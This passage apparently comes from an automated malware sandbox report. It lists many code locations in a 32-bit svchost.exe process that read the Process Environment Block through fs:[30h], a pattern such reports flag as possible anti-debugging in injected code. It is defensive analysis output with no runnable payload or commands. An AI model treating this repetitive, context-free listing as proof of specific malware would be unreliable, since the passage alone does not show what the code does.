                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h] 1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h] 1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h] 1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h] 1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h] 1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h] 1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03670185 mov eax, dword ptr fs:[00000030h] 1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h] 1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h] 1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h] 1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h] 1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h] 1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h] 1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h] 1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h] 1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h] 1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h] 1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h] 1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h] 1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03632050 mov eax, dword ptr fs:[00000030h] 1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h] 1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h] 1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h] 1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h] 1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h] 1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h] 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h] 1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h] 1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h] 1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h] 1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h] 1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h] 1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h] 1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h] 1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h] 1_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h] 1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h] 1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363208A mov eax, dword ptr fs:[00000030h] 1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638770 mov eax, dword ptr fs:[00000030h] 1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h] 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366674D mov esi, dword ptr fs:[00000030h] 1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h] 1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h] 1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03630750 mov eax, dword ptr fs:[00000030h] 1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h] 1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h] 1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h] 1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h] 1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h] 1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h] 1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h] 1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h] 1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h] 1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h] 1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h] 1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03630710 mov eax, dword ptr fs:[00000030h] 1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03660710 mov eax, dword ptr fs:[00000030h] 1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h] 1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h] 1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h] 1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h] 1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h] 1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h] 1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h] 1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036307AF mov eax, dword ptr fs:[00000030h] 1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h] 1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D678E mov eax, dword ptr fs:[00000030h] 1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h] 1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h] 1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h] 1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h] 1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03662674 mov eax, dword ptr fs:[00000030h] 1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h] 1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h] 1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03666620 mov eax, dword ptr fs:[00000030h] 1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03668620 mov eax, dword ptr fs:[00000030h] 1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363262C mov eax, dword ptr fs:[00000030h] 1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h] 1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h] 1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h] 1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h] 1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h] 1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h] 1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h] 1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h] 1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03672619 mov eax, dword ptr fs:[00000030h] 1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h] 1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h] 1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h] 1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h] 1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h] 1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h] 1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03634690 mov eax, dword ptr fs:[00000030h] 1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03634690 mov eax, dword ptr fs:[00000030h] 1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366656A mov eax, dword ptr fs:[00000030h] 1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366656A mov eax, dword ptr fs:[00000030h] 1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366656A mov eax, dword ptr fs:[00000030h] 1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638550 mov eax, dword ptr fs:[00000030h] 1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638550 mov eax, dword ptr fs:[00000030h] 1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h] 1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h] 1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h] 1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h] 1_2_03640535
